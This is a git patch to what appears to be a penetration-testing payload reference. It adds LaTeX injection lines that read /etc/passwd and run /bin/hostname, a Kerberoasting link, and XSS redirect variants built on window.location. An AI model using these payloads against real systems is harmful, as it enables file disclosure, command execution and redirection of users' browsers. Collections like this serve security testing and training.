From 644724396fe1310a40e39330679920596d4b1f67 Mon Sep 17 00:00:00 2001 From: Swissky Date: Wed, 1 Aug 2018 21:19:18 +0200 Subject: [PATCH] LaTeX display code + XSS location alternative --- LaTeX injection/README.md | 8 ++++++++ Methodology and Resources/Active Directory Attack.md | 1 + XSS injection/README.md | 8 ++++++++ 3 files changed, 17 insertions(+) diff --git a/LaTeX injection/README.md b/LaTeX injection/README.md index 3846067..0961b2f 100644 --- a/LaTeX injection/README.md +++ b/LaTeX injection/README.md @@ -26,6 +26,13 @@ Read multiple lined file \closein\file ``` +Read text file, keep the formatting +```bash +\usepackage{verbatim} +\verbatiminput{/etc/passwd} +``` + + ## Write file ```bash \newwrite\outfile @@ -48,6 +55,7 @@ If you get any LaTex error, consider using base64 to get the result without bad ```bash \input|ls|base4 +\input{|"/bin/hostname"} ``` diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 82f6fe7..a277201 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -278,6 +278,7 @@ TODO ### Kerberoast ```c +https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/ https://room362.com/post/2016/kerberoast-pt1/ diff --git a/XSS injection/README.md b/XSS injection/README.md index 522659a..aa5f418 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -424,6 +424,14 @@ foo="text "; ``` +Bypass using an alternate way to redirect +```javascript +location="http://google.com" +document.location = "http://google.com" +document.location.href="http://google.com" +window.location.assign("http://google.com") +window['location']['href']="http://google.com" +``` Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) ```javascript